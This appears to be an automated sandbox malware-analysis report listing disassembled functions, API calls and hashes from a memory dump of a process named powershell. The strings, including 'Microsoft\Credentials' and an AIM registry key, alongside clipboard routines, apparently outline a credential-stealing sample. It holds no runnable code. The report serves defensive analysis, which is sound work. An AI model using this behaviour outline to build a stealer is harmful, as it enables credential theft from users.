          • Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
        • strrchr.MSVCRT ref: 0040E6B1
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CompareFileTimememsetstrrchr
        • String ID:
        • API String ID: 4226234548-0
        • Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
        • Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
        • Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
        • Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95
        Function 00404380 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 004043A1
          • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
          • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
          • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
          • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
          • Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22
          • Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$_mbscat$_strnicmpmemset
        • String ID: Microsoft\Credentials
        • API String ID: 137454763-3148402405
        • Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
        • Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
        • Opcode Fuzzy Hash: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
        • Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5
        Function 00411EC1 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
        Download Yara Rule
        APIs
        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
        • GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: PrivateProfileString$Write
        • String ID:
        • API String ID: 2948465352-0
        • Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
        • Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
        • Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
        • Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4
        Function 00406D2B Relevance: 3.0, APIs: 2, Instructions: 21timeCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
        • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 00406D4F
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: File$ChangeCloseCreateFindNotificationTime
        • String ID:
        • API String ID: 1631957507-0
        • Opcode ID: 7bff6bc8731922aebfa0769e74e5599f4fdc97828f53a7f2077a8613dbe9e9dd
        • Instruction ID: ee1f68b728ceb5a298c60dc052c4b3ed262b371f399a07f2899d8fe9e4a13fdd
        • Opcode Fuzzy Hash: 7bff6bc8731922aebfa0769e74e5599f4fdc97828f53a7f2077a8613dbe9e9dd
        • Instruction Fuzzy Hash: C7D0123660116067872137676C0CDDF6E6ADECA326706843AF15593110D634481686A5
        Function 0040F9A0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
          • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
          • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
          • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
          • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE
          • Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
          • Part of subcall function 00406D2B: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 00406D4F
        • CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: strlen$FileTime$ChangeCloseCompareFindNotificationmemset
        • String ID:
        • API String ID: 3386971655-0
        • Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
        • Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
        • Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
        • Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65
        Function 00411D37 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
        Download Yara Rule
        APIs
        • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E
          • Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
          • Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
          • Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: PrivateProfile$StringWrite_itoamemset
        • String ID:
        • API String ID: 4165544737-0
        • Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
        • Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
        • Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
        • Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84
        Function 00406ED6 Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
        Download Yara Rule
        APIs
        • ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: FileRead
        • String ID:
        • API String ID: 2738559852-0
        • Opcode ID: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
        • Instruction ID: aa4cf13b5f890a7c287dc17e2503e7ef9553656c8147c817b9e920ceb3cbd6db
        • Opcode Fuzzy Hash: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
        • Instruction Fuzzy Hash: 21E0173691020CFBDF12CF80CC05FEEBBB9EB04B04F204068B901A62A0C7759E10EB98
        Function 004067D3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
        Download Yara Rule
        APIs
        • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040A792,00000000), ref: 004067E5
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
        • Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
        • Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
        • Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524
        Function 004067BA Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
        Download Yara Rule
        APIs
        • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
        • Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
        • Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
        • Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524
        Function 00404CE0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
        Download Yara Rule
        APIs
        • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: FreeLibrary
        • String ID:
        • API String ID: 3664257935-0
        • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
        • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
        • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
        • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
        Function 00412111 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
        Download Yara Rule
        APIs
        • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: EnumNamesResource
        • String ID:
        • API String ID: 3334572018-0
        • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
        • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
        • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
        • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
        Function 00407930 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
        Download Yara Rule
        APIs
        • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CloseFind
        • String ID:
        • API String ID: 1863332320-0
        • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
        • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
        • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
        • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
        Function 00411D68 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
        Download Yara Rule
        APIs
        • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Open
        • String ID:
        • API String ID: 71445658-0
        • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
        • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
        • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
        • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57
        Function 004069D3 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
        Download Yara Rule
        APIs
        • GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
        • Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
        • Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
        • Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00

        Non-executed Functions

        Function 004068B5 Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
        Download Yara Rule
        APIs
        • EmptyClipboard.USER32 ref: 004068BF
          • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
        • GetFileSize.KERNEL32(00000000,00000000), ref: 004068DC
        • GlobalAlloc.KERNEL32(00002000,00000001), ref: 004068ED
        • GlobalFix.KERNEL32(00000000), ref: 004068FA
        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040690D
        • GlobalUnWire.KERNEL32(00000000), ref: 0040691C
        • SetClipboardData.USER32(00000001,00000000), ref: 00406925
        • GetLastError.KERNEL32 ref: 0040692D
        • CloseHandle.KERNEL32(?), ref: 00406939
        • GetLastError.KERNEL32 ref: 00406944
        • CloseClipboard.USER32 ref: 0040694D
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
        • String ID:
        • API String ID: 2565263379-0
        • Opcode ID: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
        • Instruction ID: 43236b9afd726b755d45991aac83c0a8e3bcf6aaaa4f317cb2ebd178168b56f4
        • Opcode Fuzzy Hash: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
        • Instruction Fuzzy Hash: 07113D75904605FBD7116FA4AD4CBDE7FB8EB88325F108075F902E2290DB748944CA69
        Function 004072B5 Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
        Download Yara Rule
        APIs
        • EmptyClipboard.USER32 ref: 004072BD
        • strlen.MSVCRT ref: 004072CA
        • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040BB80,?), ref: 004072D9
        • GlobalFix.KERNEL32(00000000), ref: 004072E6
        • memcpy.MSVCRT ref: 004072EF
        • GlobalUnWire.KERNEL32(00000000), ref: 004072F8
        • SetClipboardData.USER32(00000001,00000000), ref: 00407301
        • CloseClipboard.USER32 ref: 00407311
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
        • String ID:
        • API String ID: 2315226746-0
        • Opcode ID: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
        • Instruction ID: b56ddb85736e4a30ce9fec78ed7ee79c44370bf8c75140d3078b235505e53826
        • Opcode Fuzzy Hash: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
        • Instruction Fuzzy Hash: 7DF0B437A00619BBD3112BA1BC4CEDB7B2CDBC4B96B054179FE05D6152DA38980486F9
        Function 0040BA30 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
        Download Yara Rule
        APIs
        • GetTempPathA.KERNEL32(00000104,?), ref: 0040BA4A
        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BA5C
        • GetTempFileNameA.KERNEL32(?,00418628,00000000,?), ref: 0040BA7E
        • OpenClipboard.USER32(?), ref: 0040BA9E
        • GetLastError.KERNEL32 ref: 0040BAB7
        • DeleteFileA.KERNEL32(00000000), ref: 0040BAD4
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
        • String ID:
        • API String ID: 2014771361-0
        • Opcode ID: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
        • Instruction ID: 5bfde055311aa1c1ac8a047c999dbef42aa9d8293b3a95092e24ac928ebec7a0
        • Opcode Fuzzy Hash: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
        • Instruction Fuzzy Hash: E9115276600218ABDB609BA1DC49FCB77BCAB54701F0040B6B69AE2091DBB499C58F68
        Function 00406B06 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Version
        • String ID: `A
        • API String ID: 1889659487-1337903584
        • Opcode ID: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
        • Instruction ID: da77bcce2c8e52e385cf56c8afe7a40ad3a24cfb33d571a5ca18312b8fc7eb0c
        • Opcode Fuzzy Hash: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
        • Instruction Fuzzy Hash: 8EC00279911225EBD6205B59BD08BC677A8A74D355F018476A901A2264C3F81C45C799
        Function 00402CAC Relevance: 1.5, APIs: 1, Instructions: 45COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??2@??3@memcpymemset
        • String ID:
        • API String ID: 1865533344-0
        • Opcode ID: fc129983728a693933f5d85e4071a9747e45de0643ec79e9de962b7f36dcd842
        • Instruction ID: 62c929b2a8c9eda681fcbeac590a9e5353e8b2b02561f88d837e7edf03da810a
        • Opcode Fuzzy Hash: fc129983728a693933f5d85e4071a9747e45de0643ec79e9de962b7f36dcd842
        • Instruction Fuzzy Hash: 53115A71D00209EFCF11DF50C909AEE3BB1EF08324F00806AF9556B2A0C7799E519F5A
        Function 00402D66 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
        Download Yara Rule
        APIs
        • NtdllDefWindowProc_A.NTDLL(?,?,?,?,00402F43,?,?,?), ref: 00402D78
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: NtdllProc_Window
        • String ID:
        • API String ID: 4255912815-0
        • Opcode ID: 24c9abbbc2f77973fb9f5f6e8b2dde0b2aadf82b4ac78fa5f49e8422626c4635
        • Instruction ID: 18f0fae9bb85e5f8d4e9ae0994b7d7041281ae5190cd626e6e6ab693fc77f1ec
        • Opcode Fuzzy Hash: 24c9abbbc2f77973fb9f5f6e8b2dde0b2aadf82b4ac78fa5f49e8422626c4635
        • Instruction Fuzzy Hash: CBC04C36008100FFCA024B40CD08D8ABB62AB94310F00C468B1A804030C7734061EF01
        Function 004032C8 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: %@
        • API String ID: 0-2048787947
        • Opcode ID: ad93ae6e30be9753a74d7e44eaa31557b7193723352b907c034d2df334339fc8
        • Instruction ID: 764401249e110e3cb6679b7d62141f4ed0615e28c2ac9088502d2f70acb45769
        • Opcode Fuzzy Hash: ad93ae6e30be9753a74d7e44eaa31557b7193723352b907c034d2df334339fc8
        • Instruction Fuzzy Hash: 3DC1FD76A007019BD755CFA9D8D06A9B3F2FF8C31CFAA455CC6425B752C6787A22CB80
        Function 00401246 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: d|A
        • API String ID: 0-852426002
        • Opcode ID: 533488f972ae31ce2908cb76c4a4e5969a66af9a875d5a852dfbad047ee9c73e
        • Instruction ID: 8965b49aabd178cd6e2845865c5b1b720a121828befcdf2dd3822f772577315f
        • Opcode Fuzzy Hash: 533488f972ae31ce2908cb76c4a4e5969a66af9a875d5a852dfbad047ee9c73e
        • Instruction Fuzzy Hash: 60814E72A245B04AD348CF2E8860526BBE39FCD60576FC1EED5854F26BCA31D803DB94
        Function 00401689 Relevance: .9, Instructions: 894COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e6340be2d3523c7978f1dff1794b823040ec66611f6b03ba2096102d4f34c534
        • Instruction ID: bc2cfa25497580763c1d2bb54614b14623b217e8004e18732e2f155b5d2cfc0b
        • Opcode Fuzzy Hash: e6340be2d3523c7978f1dff1794b823040ec66611f6b03ba2096102d4f34c534
        • Instruction Fuzzy Hash: AB92A6369042598FCB44CF6AECD49AE77B3EB89300B5FC5A9C64163365D730B612CB98
        Function 0040CA46 Relevance: .6, Instructions: 595COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
        • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
        • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
        • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
        Function 00405235 Relevance: .3, Instructions: 346COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 93954f015f5e6b8c85dfc6d5764cbdce22af78e26538758a0d9d6444a4458ab5
        • Instruction ID: d43244a396d5f4a3ba48707e5aa8a20fc8b38e5d6d9cf7fc243f1926763d9e64
        • Opcode Fuzzy Hash: 93954f015f5e6b8c85dfc6d5764cbdce22af78e26538758a0d9d6444a4458ab5
        • Instruction Fuzzy Hash: DAA18F37BA0B0907E30849EAACC6395B5C3D7D8354F6E82398B74C73D2E9FD99168194
        Function 00402F60 Relevance: .3, Instructions: 255COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 98b638d990f2d0190e4e281e0d140167dadd9dd4a65c3cd1cacc278d9fe1101d
        • Instruction ID: ed8d624962a64bd138e42d0c56af333949bf8528571032962a100f164d881147
        • Opcode Fuzzy Hash: 98b638d990f2d0190e4e281e0d140167dadd9dd4a65c3cd1cacc278d9fe1101d
        • Instruction Fuzzy Hash: B2C10E76A00701DBD755CFA9D8D06A9B3F2FF8C31CFAA4558C6425B752C6787A22CB80
        Function 004014AB Relevance: .1, Instructions: 129COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 622debcb5f3ffc92c74e1203300d62182344d31d64fa9ddc17c95d852f9b2314
        • Instruction ID: 545d614fe71d6218cfff75737131343f288f14b76d62fb67e2028a86465d2ab5
        • Opcode Fuzzy Hash: 622debcb5f3ffc92c74e1203300d62182344d31d64fa9ddc17c95d852f9b2314
        • Instruction Fuzzy Hash: 9D51293A9096468BC305CF19E9C0549BBB2EB8A315B1BC5B9D654AB331C730F921CF9C
        Function 004051A4 Relevance: .0, Instructions: 48COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 111d02f8ad5523aaf7009dd2665b0d782d5f10cf364f69f7ff0d7f5700c33ba2
        • Instruction ID: 5541eba4914a70d9cd97eb87dc420df8dc16cdd8bfeb51ad3953f16f0890c6b1
        • Opcode Fuzzy Hash: 111d02f8ad5523aaf7009dd2665b0d782d5f10cf364f69f7ff0d7f5700c33ba2
        • Instruction Fuzzy Hash: FB017C76B106068FD308CFADFCC0966B3A2FBD93117088539DA06C3265DB70F521CA94
